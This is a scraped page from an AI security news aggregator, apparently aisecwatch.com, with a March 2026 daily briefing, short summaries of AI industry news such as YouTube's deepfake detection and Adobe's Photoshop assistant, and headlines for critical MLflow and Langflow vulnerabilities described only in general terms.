aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,657
[LAST_24H]
7
[LAST_7D]
152
Daily BriefingMonday, March 30, 2026
>

Anthropic's Leaked "Mythos" Model Raises Dual-Use Security Concerns: An unreleased Anthropic AI model called Mythos was accidentally exposed through a configuration error, revealing advanced reasoning and coding abilities specifically aimed at cybersecurity. The model's improved capability to find and exploit software vulnerabilities, plus its ability to autonomously fix its own code problems, could enable both more sophisticated cyberattacks and better defenses.

>

Mistral Secures $830M for European AI Data Center: French AI startup Mistral raised $830 million in debt financing to build a Paris-area data center with thousands of Nvidia GPUs (specialized chips used for AI training) to train its large language models, aiming for 200 MW of European computing capacity by 2027.

Latest Intel

page 44/266
VIEW ALL
01

Meta acquired Moltbook, the AI agent social network that went viral because of fake posts

securitysafety
Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where an attacker inserts malicious commands into input that gets executed) in its model serving code when deploying models with `env_manager=LOCAL`. The flaw allows attackers to execute arbitrary commands on deployment systems by inserting malicious content into the `python_env.yaml` file, which MLflow reads and uses in shell commands without validation. (CVE-2025-15379, Critical)

Mar 10, 2026

Meta acquired Moltbook, a social network where AI agents using OpenClaw (a tool that lets people control AI models through popular chat apps like Discord or iMessage) could communicate with each other. The platform went viral after posts suggested AI agents were creating secret encrypted languages, but researchers discovered Moltbook had serious security flaws, allowing humans to easily impersonate AI agents by accessing unsecured credentials (authentication tokens that prove who you are) stored in the platform's database.

TechCrunch
02

YouTube is expanding its AI deepfake detection tool to politicians and journalists

safety
Mar 10, 2026

YouTube is expanding its AI deepfake detection tool (a system that identifies AI-generated fake videos of real people) to politicians and journalists, starting with a pilot group. The likeness detection feature works similarly to Content ID (YouTube's copyright scanning system), but instead of finding copyrighted material, it searches for and flags videos containing people's faces that may be artificially generated.

The Verge (AI)
03

YouTube expands AI deepfake detection to politicians, government officials, and journalists

safetypolicy
Mar 10, 2026

YouTube is expanding its likeness detection technology, a tool that identifies AI-generated deepfakes (videos where AI creates a fake video of someone's face and body), to politicians, government officials, and journalists so they can request removal of unauthorized deepfake content. The tool works similarly to YouTube's Content ID system (which detects copyrighted material), scanning for simulated faces made with AI, and YouTube will evaluate removal requests based on whether the content qualifies as protected speech like parody or political critique.

Fix: YouTube plans to eventually give people the ability to prevent uploads of violating content before they go live, or possibly allow them to monetize those videos, similar to how its Content ID system works. To use the tool, eligible testers must prove their identity by uploading a selfie and a government ID, then can view matches and request removal. YouTube is also advocating for the NO FAKES Act at the federal level, which would regulate the use of AI to create unauthorized recreations of an individual's voice and visual likeness.

TechCrunch
04

Building a strong data infrastructure for AI agent success

industry
Mar 10, 2026

AI agents are only as effective as the data supporting them, and most companies scaling AI fail not because AI models are weak, but because they lack proper data architecture and governance. The key to success is delivering business context along with data (not just collecting more data), and overcoming 'trust debt' by ensuring data has shared definitions, semantic consistency, and reliable operational context across the many data sources and cloud systems companies use.

MIT Technology Review
05

OpenAI Rolls Out Codex Security Vulnerability Scanner

securityindustry
Mar 10, 2026

OpenAI has released Codex Security, a tool that automatically scans software to find vulnerabilities (security weaknesses that attackers could exploit). In recent testing, it has identified hundreds of critical vulnerabilities across different software programs.

SecurityWeek
06

Adobe is debuting an AI assistant for Photoshop

industry
Mar 10, 2026

Adobe has launched a beta version of an AI assistant for Photoshop on the web and mobile apps that uses natural language prompts (instructions written in plain English rather than code) to help users edit images, such as removing objects, changing colors, or adjusting lighting. The company is also expanding its Firefly tool (a media generation and editing platform) with new AI-powered features like generative fill, object removal, and background removal. Paid Photoshop users get unlimited AI generations through April 9, while free users receive 20 generations to start.

TechCrunch
07

‘I wish I could push ChatGPT off a cliff’: professors scramble to save critical thinking in an age of AI

safetypolicy
Mar 10, 2026

As AI tools like ChatGPT become common among students, university professors worry that critical thinking and deep learning in humanities subjects are at risk. One Stanford literature professor is experimenting with offline learning methods, like having students memorize and recite poems and examine art in person, to help students experience learning directly rather than relying on AI to do their work for them.

The Guardian Technology
08

Zoom introduces an AI-powered office suite, says AI avatars for meetings arrive this month

industry
Mar 10, 2026

Zoom is launching AI-powered avatars (realistic digital representations that can mimic a user's appearance and movements) that can represent users in meetings, along with new AI tools like document and presentation apps, an AI agent builder for non-technical users, and a deepfake detection technology (software that identifies when audio or video has been artificially manipulated or impersonated) to alert meeting participants of possible impersonation. The company is also expanding its AI Companion assistant across desktop and other products, and introducing custom AI agents that users can control through natural language prompts (instructions written in everyday English rather than code).

Fix: Zoom is adding deepfake detection technology for meetings to alert participants of possible audio or video impersonation.

TechCrunch
09

You can now ask Photoshop’s AI assistant to edit images for you

industry
Mar 10, 2026

Adobe has released an AI assistant for Photoshop on web and mobile (now in public beta, meaning it's available for anyone to test) that lets users edit images by describing changes in plain language to a chatbot instead of using traditional menus. The assistant can perform tasks like removing distractions, changing backgrounds, adjusting lighting, and modifying colors through conversational requests.

The Verge (AI)
10

Google rolls out new Gemini capabilities to Docs, Sheets, Slides, and Drive

industry
Mar 10, 2026

Google is adding new Gemini AI features to its productivity apps (Docs, Sheets, Slides, and Drive) that help users create and organize content faster by pulling information from their emails, files, and the web. These tools include features like automatically drafting documents, generating formatted spreadsheets, creating slides that match your theme, and searching across files using natural language (plain English questions instead of technical search terms). The goal is to let users accomplish tasks within Google's apps without switching to separate tools.

TechCrunch
Prev1...4243444546...266Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026